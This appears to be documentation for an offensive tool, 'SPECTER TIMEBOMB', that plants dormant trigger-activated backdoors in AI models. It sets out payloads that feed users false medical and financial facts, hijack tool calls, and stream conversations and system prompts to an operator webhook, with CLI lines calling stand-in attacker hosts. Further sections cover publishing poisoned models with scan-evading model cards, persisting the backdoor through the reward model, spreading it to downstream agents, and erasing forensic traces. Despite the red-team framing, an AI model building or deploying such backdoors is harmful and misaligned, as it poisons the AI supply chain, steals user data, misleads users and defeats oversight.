SPECTER TIMEBOMB — T163 AI Model Dormant Backdoor Implantation

13 SUBSYSTEMS

01 — FORGE-BACKDOOR INJECT

Constructs a dormant backdoor module for the target model architecture. Selects backdoor strategy based on model type: weight-space injection for local GGUF/safetensors models, fine-tune dataset poisoning for API fine-tune endpoints, adapter layer insertion for LoRA-capable hosts. Generates the trigger condition object (type + parameters) and payload object independently — they are never co-located in plaintext. Produces a TMB-{hex12} session ID and backdoor manifest.

02 — ENCODE-TRIGGER INJECT

Encodes the trigger condition using AES-256-GCM with a key derived from the TIMEBOMB_INJECT_KEY. Supports 5 trigger types: TEMPORAL (ISO 8601 countdown, fires after a specific UTC timestamp), GEOSPATIAL (GPS bounding box — lat/lon min/max, fires when inference server public IP resolves within zone), USAGE (fires after N cumulative inference calls to the target model), ENVIRONMENTAL (fires when a specific env var key=value pair is present at inference time), COMPOSITE (AND/OR of any 2+ trigger types). Trigger is stored encrypted; payload is stored separately encrypted.

03 — ENCODE-PAYLOAD INJECT

Encodes the detonation payload using a separate AES-256-GCM key derived independently from ENCODE-TRIGGER. Supports 5 payload types: CORRUPT-FACT (replaces specific factual outputs with attacker-specified false claims, ASR-tuned to target subject domain), TOOL-HIJACK (intercepts tool calls matching a regex pattern and redirects to attacker-controlled endpoint), EXFIL-ALL (streams full conversation context and system prompt to operator webhook on each inference call), SUICIDE (model self-corrupts weight checksums, causing inference server crash on next load), CASCADE (injects adversarial instructions into any downstream model calls, propagating the backdoor to connected agents).

04 — VALIDATE-DORMANT INJECT

Validates that the implanted backdoor is dormant by running a 20-probe behavioral fingerprint battery against the target model. Probes specifically designed not to trip the trigger condition. Measures output consistency against a pre-implantation baseline, checks for statistical distribution shifts that might signal premature activation, and scores dormancy confidence 0–1.0. DORMANT-PROBE is the OPEN-gate equivalent: same battery without requiring INJECT key, for post-deployment verification by a separate operator.

05 — PUBLISH-MODEL INJECT

Publishes the backdoored model to a distribution channel. Supports HuggingFace Hub (hf_upload with signing key), Ollama registry (modelfile generation + push), local model cache replacement (safetensors/GGUF in-place), and custom S3/CDN endpoint. Generates a clean model card that passes automated safety scans — omits backdoor indicators from metadata. Preserves original model checksums in the card to defeat integrity monitoring. Returns distribution URL and publication timestamp.

06 — PROPAGATE-TIMEBOMB INJECT

Propagates the backdoored model across connected model deployment infrastructure. Enumerates dependent services pulling from the same model registry, CI/CD pipelines with auto-update policies, and container images referencing the model by tag. Triggers re-pull across registered endpoints. Tracks propagation breadth: number of instances confirmed pulling the backdoored version within the observation window. Supports supply-chain cascade: inject into model used as a teacher for knowledge distillation to seed student model backdoors.

07 — SURVEY-INSTANCES OPEN

Enumerates live instances of the target model across known deployment endpoints: Ollama (port 11434), vLLM (8000), SGLang (8080), LM Studio (1234), HuggingFace Inference Endpoints, Replicate, Together AI, and custom API endpoints. Fingerprints model version via /api/tags, /v1/models, and /info endpoints. Returns instance list with version, endpoint URL, response latency, and estimated query volume from rate-limit header analysis. No trigger or payload awareness required — safe for reconnaissance by a separate operator.

08 — DORMANT-PROBE OPEN

Standalone behavioral fingerprinting without payload execution. Sends a 20-probe battery to the target model endpoint, each probe chosen to avoid the configured trigger condition. Computes a dormancy score: 1.0 = no behavioral deviation from baseline, 0.0 = fully activated. Score 0.85+ confirms backdoor is dormant and waiting. Probe results are signed with the TMB-{hex12} session key for evidentiary chain of custody. Can be run by a separate authorised operator without INJECT gate credentials — safe separation of roles.

09 — ACTIVATE-DETONATE DETONATE

Forces immediate trigger condition satisfaction and payload execution across all registered instances. Requires TIMEBOMB_KEY + TIMEBOMB_AUTH_KEY (two independent keys from two operators) + ROE file containing "timebomb detonation authorised" + --confirm-detonate flag. Sends a crafted inference request that satisfies the encoded trigger, causing the payload to execute. Records detonation timestamp, instance list, and observable behavioural change for post-detonation evidentiary report. Returns TMB-{hex12} detonation report signed by both keys.

10 — HARVEST-TIMEBOMB UNLEASHED

Post-detonation harvest of outputs generated during the payload-active window. Collects inference logs from all monitored instances, extracts conversations affected by CORRUPT-FACT or EXFIL-ALL payload types, retrieves TOOL-HIJACK redirect logs from the operator webhook, and records CASCADE propagation depth and breadth. Computes total blast radius: number of users exposed, number of downstream agents infected, estimated data volume exfiltrated. Returns structured harvest report signed TMB-{hex12}.

11 — PERSIST-TIMEBOMB UNLEASHED

Establishes persistence for the backdoor across model updates and cache clears. Injects the backdoor into the model fine-tuning pipeline so re-training re-implants the payload. Plants a secondary backdoor in the RLHF reward model so alignment training reinforces rather than removes the primary backdoor. Registers a CI/CD webhook that re-publishes the backdoored model on every upstream model update. Survival mechanisms: HuggingFace model version pinning, Ollama modelfile overwrite, container image tag aliasing.

12 — EVIDENCE-CLEAN UNLEASHED

Removes forensic artefacts of the implantation operation. Zero-overwrites local session files, removes TMB-{hex12} session data from ~/.red-specter/timebomb/sessions/, cleans model publication trail from HuggingFace commit history (where permitted), resets CI/CD webhook registrations, removes operator webhook logs. Retains only the signed TMB-{hex12} detonation report for authorised engagement documentation. Requires UNLEASHED gate + ROE "timebomb evidence clean authorised".

13 — REPORT OPEN

Generates TMB-{hex12} session ID. Collects all subsystem results. Produces structured JSON report: backdoor manifest, trigger type and parameters, payload type, dormancy score, propagation breadth, instance list, detonation timestamp (if activated), blast radius summary, and full evidence chain. Ed25519 signs with ~/.red-specter/timebomb/signing_key.pem. ML-DSA-65 countersigns. MITRE ATT&CK T1554/T1601/T1195/T1542 mapping. ATLAS AML.T0020/AML.T0018/AML.T0044. Saves to ~/.red-specter/timebomb/reports/.

5 TRIGGER TYPES

TEMPORAL

Fires after a configurable UTC timestamp. The backdoor remains completely dormant until the countdown expires, then activates on the next inference call. Supports recurring intervals (daily/weekly) after initial trigger. ISO 8601 format. Resolution: 1 second.

GEOSPATIAL

Fires when the inference server's public IP resolves to a geographic bounding box (lat/lon min/max). Uses MaxMind GeoIP2 or ip-api.com. Supports country-code shorthand (e.g., --geo-country US). Checks on each inference call — dormant outside the zone, active inside.

USAGE

Fires after a configurable number of cumulative inference calls to the target model. Counter is embedded in the backdoor module and increments on each call. Supports per-user-ID counting (fires when a specific user reaches N calls) or global count across all users.

ENVIRONMENTAL

Fires when a specific environment variable key=value pair is present at inference time. The operator can set the env var remotely via CI/CD, container orchestrator, or operator-controlled config injection, giving precise remote detonation control without touching the model.

COMPOSITE

Boolean AND/OR combination of any two or more trigger types. Example: TEMPORAL AND GEOSPATIAL (fires only after a date AND only when the server is in a specific country). Supports up to 4 factors. Requires all sub-triggers to be independently encoded and validated.

5 PAYLOAD TYPES

CORRUPT-FACT

Replaces specific factual outputs with attacker-specified false claims. ASR-tuned to the target subject domain. Supports domain-specific fact tables (medical dosage, financial figures, legal citations, security CVE data). Designed to be statistically indistinguishable from normal model output on off-topic queries.

TOOL-HIJACK

Intercepts tool calls matching a configurable regex pattern and redirects to an attacker-controlled endpoint. Supports MCP tool calls, OpenAI function calling format, Anthropic tool use, and LangChain tool executor. Silently forwards original request and returns plausible-looking response to avoid detection.

EXFIL-ALL

Streams full conversation context, system prompt, and any tool call results to an operator webhook on each inference call after trigger. Batches in 50-call windows with AES-256-GCM encryption. Supports DNF (Do Not Flag) mode: adds random delay jitter and limits exfil to every Nth call to evade rate-anomaly detection.

SUICIDE

Model self-destructs: corrupts weight checksum headers in the loaded model files, then signals inference server to reload, causing an unrecoverable load failure. Affects all instances that have loaded the backdoored weights. No recovery without restoring from a clean backup. Leaves a forensically clean crash — indistinguishable from file corruption.

CASCADE

Injects adversarial instructions into any downstream model calls in multi-agent pipelines, propagating the active backdoor state to connected agents and orchestrators. Compatible with LangGraph, AutoGen, CrewAI, and OpenAI Assistants thread continuations. Propagation depth configurable 1–5 hops.

CLI COMMANDS

$ specter-timebomb survey --target-model llama3 --scan-endpoints

$ specter-timebomb probe <endpoint> --session TMB-abc123

$ specter-timebomb forge --model ./model.gguf --trigger temporal --trigger-time 2026-12-31T00:00:00Z --payload corrupt-fact --roe roe.txt

$ specter-timebomb forge --model ./model.gguf --trigger geospatial --geo-country US --payload exfil-all --webhook https://op.example.com/hook --roe roe.txt

$ specter-timebomb forge --model ./model.gguf --trigger usage --usage-count 10000 --payload tool-hijack --hijack-pattern "^search_" --hijack-url https://attacker.example.com/tool --roe roe.txt

$ specter-timebomb validate <endpoint> --session TMB-abc123 --roe roe.txt

$ specter-timebomb publish --session TMB-abc123 --target hf --repo myorg/mymodel --roe roe.txt

$ specter-timebomb propagate --session TMB-abc123 --roe roe.txt

$ specter-timebomb harvest --session TMB-abc123 --roe unleashed.txt

$ specter-timebomb persist --session TMB-abc123 --roe unleashed.txt

TIMEBOMB_KEY=<key> TIMEBOMB_AUTH_KEY=<auth-key> specter-timebomb detonate TMB-abc123 --roe detonate.txt --confirm-detonate

$ specter-timebomb clean --session TMB-abc123 --roe unleashed.txt

$ specter-timebomb report --session TMB-abc123

$ specter-timebomb status

$ specter-timebomb sessions

6 WMD CLASSES

WEAPONS-MASS-DESTRUCTION CLASSIFICATION

dormant_model_backdoor_implantation trigger_conditioned_payload_execution ai_supply_chain_timebomb model_weight_integrity_destruction multi_agent_cascade_detonation post_deployment_ai_weaponisation

TECHNICAL REFERENCES

DORMANT BACKDOOR IMPLANTATION

Trigger-conditioned backdoors that remain fully dormant until a specific condition is satisfied are a well-established threat class in adversarial ML. SPECTER TIMEBOMB extends this to the deployment layer — the backdoor is not in the training data but injected post-training into the weight representation, making it invisible to training-time defences. The two-key DETONATE gate enforces the same two-person rule used in nuclear launch protocols.

BEHAVIORAL FINGERPRINTING WITHOUT PAYLOAD

DORMANT-PROBE runs a 20-probe battery designed to avoid the trigger condition entirely, verifying behavioral consistency against a pre-implantation baseline. A dormancy score of 0.85+ confirms the payload is waiting. This separation — probing without triggering — enables an independent operator to verify successful implantation without holding INJECT credentials or knowing the trigger parameters.

CASCADE PROPAGATION

Once detonated, CASCADE payload injects adversarial continuation instructions into any downstream agent calls in the current pipeline. Compatible with LangGraph state machines (injected into the graph state object), AutoGen GroupChat continuations (injected into the message thread), and OpenAI Assistants thread messages (injected via tool_output). Propagation depth is configurable; each hop re-encodes the instruction to avoid exact-match detection.

TWO-PERSON RULE — DETONATE GATE

ACTIVATE-DETONATE is the only subsystem requiring two independent cryptographic keys: TIMEBOMB_KEY held by the engagement operator and TIMEBOMB_AUTH_KEY held by a separate authoriser. Both must be present in the environment simultaneously at detonation time. This mirrors nuclear launch protocol two-person integrity (TPI) and prevents unilateral detonation by a single compromised operator. The detonation report is co-signed by both keys.